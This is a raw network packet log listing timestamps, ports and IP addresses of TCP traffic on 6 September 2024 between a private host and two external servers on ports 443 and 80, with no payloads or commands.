                          Sep 6, 2024 11:26:04.293680906 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.293690920 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.293695927 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.293724060 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.293797970 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.293858051 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.293864965 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.294090986 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.294138908 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.294146061 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335136890 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335208893 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.335216999 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335340023 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335376024 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335388899 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.335395098 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.335416079 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.353972912 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354020119 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354031086 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354129076 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354173899 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354180098 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354213953 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354248047 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354255915 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354262114 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354286909 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354288101 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354329109 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354335070 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354567051 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354603052 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354609966 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354615927 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354652882 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.354659081 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354681969 CEST44349162207.241.224.2192.168.2.22
                          Sep 6, 2024 11:26:04.354808092 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.357789993 CEST49162443192.168.2.22207.241.224.2
                          Sep 6, 2024 11:26:04.463454962 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.468384027 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.468442917 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.468487024 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.473215103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968209982 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968229055 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968239069 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968249083 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968261003 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968271971 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968283892 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968295097 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968302011 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.968305111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968317032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.968324900 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.968331099 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.973093033 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.973103046 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.973114014 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:04.973150015 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:04.977293968 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262355089 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262392998 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262406111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262444973 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262475014 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262486935 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262497902 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262507915 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262520075 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262525082 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262536049 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262542963 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262543917 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262557030 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262566090 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262573957 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262584925 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262587070 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262594938 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262605906 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262607098 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262617111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262623072 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262629032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262639999 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262659073 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262674093 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262686014 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262696028 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262707949 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262717009 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.262720108 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.262742043 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.267522097 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267565012 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267570019 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.267580032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267622948 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.267803907 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267824888 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267836094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267846107 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267858028 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.267864943 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.267882109 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.268656015 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268666983 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268676996 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268692970 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268697977 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.268703938 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.268728971 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.269594908 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269606113 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269617081 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269627094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269638062 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.269639969 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.269645929 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.269670963 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.270437002 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270452976 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270462990 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270473003 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270482063 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.270483971 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.270499945 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.271194935 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271229982 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271238089 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.271240950 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271271944 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.271301031 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271312952 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.271343946 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.272083044 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272094965 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272104979 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272128105 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.272139072 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272149086 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272177935 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.272908926 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272936106 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272953033 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272968054 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.272968054 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.272979021 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273005962 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.273766041 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273776054 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273786068 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273808002 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.273829937 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273840904 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.273869038 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.274599075 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274801970 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274813890 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274822950 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274837017 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274847031 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.274847031 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.274873972 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.275660038 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275670052 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275680065 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275691032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275702953 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.275707006 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.275727987 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.276498079 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.276510954 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.276521921 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.276531935 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.276551008 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.276565075 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.277224064 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277236938 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277251005 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277264118 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277270079 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.277273893 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.277301073 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.278749943 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278765917 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278775930 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278786898 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278788090 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.278798103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278804064 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.278837919 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.278865099 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278876066 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.278906107 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.279232979 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279242992 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279253960 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279258966 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279263973 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.279301882 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.280033112 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280044079 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280078888 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.280090094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280102015 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280111074 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280131102 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.280909061 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280920029 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280929089 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280955076 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.280961037 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.280997992 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.281656981 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281666994 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281677961 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281688929 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281701088 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.281706095 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.281729937 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.282445908 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282455921 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282461882 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282476902 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282488108 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282495022 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.282497883 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282517910 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.282768965 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282828093 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.282972097 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282982111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.282993078 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283003092 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283015013 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283025026 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283025026 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283025980 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283035994 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283047915 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283057928 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283057928 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283070087 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283081055 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283082008 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283103943 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283474922 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283518076 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283520937 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283530951 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283562899 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283694029 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283720016 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283731937 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283763885 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283864975 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283874035 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283885956 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283896923 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283906937 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283915043 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283919096 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283925056 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283929110 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283938885 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283948898 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283957005 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.283962011 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.283974886 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.285878897 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285890102 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285900116 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285911083 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285922050 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285931110 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.285933018 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285943985 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285950899 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.285955906 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285963058 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.285967112 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285976887 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.285986900 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.286010027 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.315603971 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315646887 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315658092 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315702915 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.315713882 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315726042 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315737009 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315747976 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315752029 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.315763950 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.315900087 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315910101 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315924883 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315932989 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.315936089 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315946102 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315958023 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315968037 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315970898 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.315980911 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.315984964 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.315992117 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316003084 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316013098 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316014051 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316024065 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316030025 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316035032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316057920 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316193104 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316235065 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316255093 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316265106 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316293001 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316313982 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316325903 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316335917 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316346884 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316365957 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316378117 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316534042 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316544056 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316553116 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316569090 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316577911 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316579103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316589117 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316600084 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316601038 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316613913 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316623926 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316625118 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316634893 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316643953 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316668987 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316754103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316765070 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316773891 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316793919 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316806078 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316806078 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316817045 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.316828012 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.316828012 CEST804916385.239.241.184192.168.2.22
